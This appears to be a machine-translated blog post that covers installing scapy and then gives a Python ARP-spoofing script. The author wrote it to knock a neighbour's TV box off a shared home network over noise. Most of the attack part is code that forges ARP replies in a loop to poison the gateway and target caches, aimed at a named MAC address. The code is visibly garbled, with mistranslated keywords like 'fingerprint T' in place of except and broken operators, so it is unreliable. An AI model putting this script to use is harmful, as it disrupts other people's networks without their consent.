Learn scapy and how to learn scrapy

Learn scapy and how to learn scrapy

 

It was not long ago that we knew the scapy tool. Its strength lies in its ability to modify data packets, which is more convenient to use based on python.

I really started to study TCP/IP half a year ago, but I was confused after reading the FreeRTOS-TCP/IP source code for a month. Fortunately, I understood a lot about the TCP/IP protocol.

I have been familiar with Python a month ago.

 

Ubuntu14.04 install scapy

 

Because Python2.7 has been installed in my system but pip is not installed, install pip first.

1 sudo apt-get install python-pip

If it fails, try the following sentence:

1 sudo apt-get update --fix-missing

Install scapy after pip is installed.

sudo pip install scapy

Now scapy has been installed. You can test the following:

Vmuser @ Linux-host :~ /Desktop $ pythonPython 2.7.3 (default, Oct 26 2016, 21:04:23) [GCC 4.6.3] on linux2Type "help", "copyright ", "credits" or "license" for more information. >>> from scapy. all import * >>> a = IP () >>> a <IP | >>>> get_if_hwaddr ("eth0") '00: 0c: 29: 70: b1: 85 '>

Eth0 is my Nic.

 

Python3.6

 

pip install scapy

Or

pip3 install scapy-python3

 

Arp attack example (1)

 

Hardware Platform: Dragon Board Objective C

System: Debian

Python: 2.7.

One person rented a house out of the room and had no trouble disturbing the neighbors. Recently, some tenants watched TV and had a sound. There was a development board at hand, and they planned to use scapy to launch ARP attacks to bring them offline.

The principle of ARP attacks is a brief introduction. Basically, it is to forge packets and pollute the arp cache table of the host or gateway. If it is complicated, it is necessary to pretend to be a gateway or an intermediate attack. How can this problem be solved.

First, you need to know what kind of device the recipient is. Use a LAN scanning tool to scan the active host and then locate the MAC address based on its MAC address. The scan result is as follows:

C8-3A-35-C0-05-15 Tenda Technology Co ., ltd.04-E6-76-46-A6-F3 AMPAK Technology, Inc.78-02-F8-34-4D-B5 private 24-09-95-95-E2-02 huawei technologies co ., LTD20-47-47-BA-99-1E Dell Inc.70-14-A6-37-3F-0F Apple, Inc. e8-B4-C8-7B-F3-0F Samsung Electronics Co ., ltd 48-3B-38-D9-8D-D8 Apple, Inc.

"AMPAK" is the most suspicious. Baidu once identified it as a Xiaomi box. (Problem: AMPAK has been detected for multiple times for IP scanning ....)

After the MAC is locked, I guess they (an old couple watching TV every day !!) Cannot escape

 

1 #! /Usr/bin/env python 2 # _ * _ coding = UTF-8 _ * _ 3 4 from scapy. all import * 5 import time 6 import random 7 # ------------------------------------------------------- 8 def GetSubNet (OurIP): 9 ''' 10 get the subnet, 192.168.0 11 ''' 12 Index = 0 13 SubString = "" 14 while True: 15 num = OurIP. find ('. ', Index) 16 if num! =-1: 17 Index = num + 1 18 if num =-1: 19 SubString = OurIP [: Index] 20 break 21 return SubString 22 # define 23 def GetMac (tgtIP): 24''' 25. Obtain the MAC address of the target IP address. 26 tgtIP: Target IP address 27 ''' 28 try: 29 tgtMac = getmacbyip (tgtIP) 30 return tgtMac 31 fingerprint T: 32 print (tgtIP, "check whether the target IP address is alive ") 33 # ------------------------------------------------------- 34 def GetBrocastIP (OurIP): 35 ''' 36 get Lan broadcast address 37 OurIP: Our IP address 38 ''' 39 return GetSubNet (OurIP) + "255" 40 # ------------------------------------------------------- 41 def GetForgetIP (OurIP, Num): 42''' 43 forged IP address 44 O UrIP: our own IP address 45 Num: How many IP addresses are forged: 46 ''' 47 SubString = GetSubNet (OurIP) 48 # counterfeit IP 49 ForgetIP = [] 50 I = 0 51 while I <Num: 52 num = int (random. uniform (0,255) 53 TempIP = SubString + "% d" % num 54 if TempIP = OurIP: 55 continue 56 else: 57 ForgetIP. append (TempIP) 58 I = I + 1 59 return ForgetIP 60 # --------------------------------------------------------- 61 def GetForgeMac (OurMac, Num): 62''' 63 generation Host MAC address 64 OurMac: We can't repeat ourselves with our own MAC address. 65 '''66 ForgeMac = [] 67 j = 0 68 while j <Num: 69 while True: 70 I = 0 71 TempMac = "" 72 while I <6: 73 num = int (random. uniform (0,255) 74 TempMac = TempMac + "% 02X" % num 75 if I <= 4: TempMac = TempMac + ": "76 I = I + 1 77 if TempMac = OurMac: 78 pass 79 else: 80 ForgeMac. append (TempMac) 81 j = j + 1 82 break 83 return ForgeMac 84 #--------------------- -------------------------------- 85 def AttackMac (Mac, face, Num, Interval, GW_IP): 86 ''' 87 attacks MAC 88 Mac: MAC address 89 face: network Interface for sending attack packets 90 GW: whether to only attack the gateway 91 ''' 92 Broadcast_mac = "FF: FF "93 GW_MAC =" "94 try: 95 OurIP = get_if_addr (face) 96 if GW_IP! = "": GW_MAC = GetMac (GW_IP) 97 packet T: 98 OurIP = "192.168.0.105" 99 return100 Broadcast_ip = GetBrocastIP (OurIP) 101 while True: 102 ForgeIP = GetForgetIP (OurIP, Num) 103 # generate a data packet 104 if GW_IP! = "": 105 # attack gateway 106 pkt = Ether (dst = GW_MAC, src = Mac)/\ 107 ARP (psrc = ForgeIP, pdst = GW_IP, \ 108 hwsrc = Mac, hwdst = GW_MAC, op = 2) 109 else: 110 # attack 111 pkt = Ether (dst = Broadcast_mac, src = Mac)/\ 112 ARP (psrc = ForgeIP, pdst = Broadcast_ip, \ 113 hwsrc = Mac, op = 1) 114 # send data packet 115 try: 116 # print (ls (pkt) 117 # input () 118 sendp (pkt, iface = face) 119 bytes T: 120 print ("!! Send Error !! 121 break122 time. sleep (float (Interval) 123 # define 124 def AttackIP (tgtIP, face, Num, Interval, GW_IP): 125 ''' 126 attack IP address 127 tgtIP: Target IP128 face: nic interface 129 Num: Number of attack packets 130 Interval: Attack Interval 131 ''' 132 # broadcast address 133 GW_MAC = "" 134 Broadcast_mac = "FF: FF "135 # local 136 try: 137 OurMac = get_if_hwaddr (face) 138 OurIP = get_if_addr (face) 139 if GW_IP! = "": GW_MAC = GetMac (GW_IP) 140 running T: 141 OurMac = "00: 00: 00: 00: 00: 00: 00 "142 OurIP =" 192.168.0.105 "143 Broadcast_ip = GetBrocastIP (OurIP) 144 while True: 145 # Prepare data packets 146 ForgeMac = GetForgeMac (OurMac, Num) 147 if GW_IP! = "": 148 # attack gateway 149 pkt = Ether (dst = GW_MAC, src = ForgeMac)/\ 150 ARP (psrc = tgtIP, pdst = GW_IP, \ 151 hwsrc = ForgeMac, hwdst = GW_MAC, op = 2) 152 else: 153 # attack 154 pkt = Ether (dst = Broadcast_mac, src = ForgeMac)/\ 155 ARP (psrc = tgtIP, pdst = Broadcast_ip, \ 156 hwsrc = ForgeMac, op = 1) 157 # send data packets 158 try: 159 sendp (pkt, iface = face) 160 bytes T: 161 print ("!! Send Error !! ") 162 break163 # delay 164 time. sleep (float (Interval) 165 # ----------------------------------------------------- 166 Table ={} 167 def Scanf (OurIP, Start, End): 168 ''' 169 scan network, get the IP-MAC and save 170 OurIP: Our IP address 171 Start: Scan Start address 172 End: Scan End address 173 for example: OurIP = 192.168.0.105, Start = 99, End = 150174 scan IP Range: 192.168.0.99 ~ 192.168.0.150175 ''' 176 SubString = GetSubNet (OurIP) 177 for num in range (Start, End): 178 ip = SubString + str (num) 179 arpPkt = Ether (dst = "ff: ff")/ARP (pdst = ip, hwdst = "ff: ff: ff ") 180 res = srp1 (arpPkt, timeout = 1, verbose = 0) 181 if res: 182 Table [res. psrc] = res. hwsrc183 return Table184 # ------------------------------------------------------- 185 def GetIpByMac (Mac): 186 if len (Table) = 0: return None187 return Table. get (Mac) 188 189 def Attack_xiaomi (Face, PackNum, Counter, Interval): 190 ''' 191 attack Xiaomi box 192 Face: Nic interface 193 PackNum: number of packets 194 Counter: number of attacks (-1: Unlimited) 195 Interval: Attack Interval 196 for example: Face = "wlan0", PackNum = 10, Counter =-1, interval = 1197 ''' 198 MY_ip = get_if_addr (Face) 199 MY_mac = get_if_hwaddr (Face) 200 if MY_ip = None or MY_mac = None: return201 202 GW_ip = "192.168.0.1" 203 GW_mac = GetMac (GW_ip) 204 if GW_mac = None: return205 206 Scanf (MY_ip, 99,150) 207 208 XM_mac = "04: E6: 76: 46: A6: f3 "209 XM_ip = encrypt (XM_mac) 210 if XM_ip = None: return211 212 while True: 213 # Attack packs214 Temp_mac = GetForgeMac (MY_mac, PackNum) 215 Temp_ip = GetForgetIP (MY_ip, packNum) 216 217 PKT_2_XM_4_mac = Ether (src = GW_mac, dst = XM_mac)/ARP (psrc = Temp_ip, pdst = XM_ip, op = 2) 218 PKT_2_XM_4_ip = Ether (src = Temp_mac, dst = XM_mac)/ARP (psrc = GW_ip, pdst = XM_ip, op = 2) 219 PKT_2_GW_4_XM_mac = Ether (src = XM_mac, dst = GW_mac) /ARP (psrc = Temp_ip, pdst = GW_ip, op = 2) 220 PKT_2_GW_4_XM_ip = Ether (src = Temp_mac, dst = GW_mac)/ARP (psrc = XM_ip, pdst = GW_ip, op = 2) 221 try: 222 sendp (PKT_2_XM_4_mac, iface = Face) 223 time. sleep (0.5) 224 sendp (PKT_2_XM_4_ip, iface = Face) 225 time. sleep (0.5) 226 sendp (PKT_2_GW_4_XM_mac, Iface = Face) 227 time. sleep (0.5) 228 sendp (PKT_2_GW_4_XM_ip, iface = Face) 229 bytes T: 230 print ("!! Send Error !! ") 231 # sleepw.num = int (random. uniform (0, Interval) 233 time. sleep (num) 234 if Counter =-pass236 else: 237 Counter = Counter-1238 if Counter = 0: 239 return240 241 if _ name _ = "_ main _": 242 # while True: 243 # AttackIP ("192.168.0.108", "wlan0", 244, "192.168.0.1") 245 # AttackMac (Mac, face, Num, Interval, GW_IP): # AttackMac ("C8: 3A: 35: C0: 05: 15 "," wlan0 ", 246," 192.168.0.108 ") 247 while True: Attack_xiaomi (" wlan0 ", 5)